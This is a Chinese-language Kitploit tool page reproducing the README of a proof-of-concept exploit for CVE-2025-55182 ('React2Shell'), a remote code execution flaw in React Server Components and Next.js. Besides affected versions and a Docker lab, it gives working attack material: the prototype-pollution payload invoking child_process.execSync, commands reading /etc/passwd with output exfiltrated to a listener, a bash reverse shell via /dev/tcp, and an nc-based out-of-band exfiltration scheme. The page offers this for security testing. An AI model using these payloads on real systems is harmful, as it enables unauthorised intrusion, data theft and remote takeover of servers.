Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182 — CVE-2025-55182 React2Shell PoC | Kitploit
工具/GitHubGitHub/lowercasenumbers/cve-2025-55182
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育远程访问工具
GitHublowercasenumbers/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 React2Shell PoC

查看仓库
9个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182 - React2Shell PoC

CVE-2025-55182(CVSS 10.0)关键未认证远程代码执行漏洞的概念验证利用程序,影响 React Server Components。

致谢

发现者:Lachlan Davidson - 于2025年11月29日向 Meta/React 团队披露。

漏洞概述

该漏洞存在于 React Flight 协议的反序列化逻辑中。通过 HTTP POST 发送恶意负载,攻击者能够实现原型污染,进而导致在服务器上执行任意代码。

受影响版本

软件包受影响版本
react-server-dom-webpack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-parcel19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-turbopack19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js15.0.4, 15.1.8, 15.2.5, 15.3.5, 15.4.7, 15.5.6, 16.0.6

受影响框架

  • Next.js
  • React Router (含 RSC)
  • Waku
  • @parcel/rsc
  • @vitejs/plugin-rsc
  • rwsdk (Redwood)

文件

root@kitploit:~
.
├── exploit.py           # 漏洞利用脚本
├── docker-compose.yml   # 易受攻击的测试环境
├── vulnerable-app/      # 易受攻击的 Next.js 应用
└── README.md

快速开始

1. 启动漏洞容器

root@kitploit:~
docker compose up -d

这将在 http://localhost:3000 上启动一个易受攻击的 Next.js 应用。

2. 检查目标是否易受攻击

root@kitploit:~
python3 exploit.py -u http://localhost:3000 --check

此操作执行一次非利用性检查,寻找以下指标:

  • 框架检测(Next.js、Waku、React Router 等)
  • Flight 协议标记
  • Server Actions
  • 版本检测

3. 利用(盲执行)

root@kitploit:~
python3 exploit.py -u http://localhost:3000 -c "id"

执行命令,但不显示输出。可通过以下方式验证:

4. 利用并外泄输出

root@kitploit:~
python3 exploit.py -u http://localhost:3000 -c "id" --exfil <IP>:<PORT>

你的 IP 地址; 监听端口

用法

root@kitploit:~
usage: exploit.py [-h] -u URL [-c COMMAND] [--check] [--exfil HOST:PORT]
                  [--timeout TIMEOUT] [--no-verify]

选项:
  -u, --url URL         目标 URL
  -c, --command CMD     要执行的命令
  --check               检查是否可被利用(非利用性)
  --exfil HOST:PORT     将输出外泄至 HOST:PORT
  --timeout TIMEOUT     请求超时时间(默认:10)
  --no-verify           禁用 SSL 验证

示例

root@kitploit:~
# 检查漏洞
python3 exploit.py -u http://localhost:3000 --check

# 盲 RCE
python3 exploit.py -u http://localhost:3000 -c "touch /tmp/pwned"

# RCE 并获取输出
python3 exploit.py -u http://localhost:3000 -c "whoami" --exfil 172.17.0.1:9999

# 读取文件
python3 exploit.py -u http://localhost:3000 -c "cat /etc/passwd" --exfil 172.17.0.1:9999

# 反弹 Shell
python3 exploit.py -u http://localhost:3000 -c "bash -c 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'"

负载结构

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\": \"$B0\"}",
  "_response": {
    "_prefix": "process.mainModule.require('child_process').execSync('id');",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

外泄

利用过程会破坏服务器状态,导致带内响应外泄不可靠。--exfil 标志使用带外外泄:

root@kitploit:~
┌──────────┐  1. 恶意 POST    ┌──────────┐
│ 攻击者   │ ────────────────►  │  服务器  │
└──────────┘                      └──────────┘
     ▲                                 │
     │  3. 通过 nc 接收              │ 2. RCE 执行:
     │     命令输出                   │    cmd | nc 攻击者端口
     │                                 ▼
     └─────────────────────────────────┘

清理

root@kitploit:~
docker compose down

免责声明

本工具仅用于授权的安全测试和教育目的。仅限对你有权测试的系统使用。

参考

  • React 安全通告
  • NVD - CVE-2025-55182
  • Datadog 安全实验室
下载工具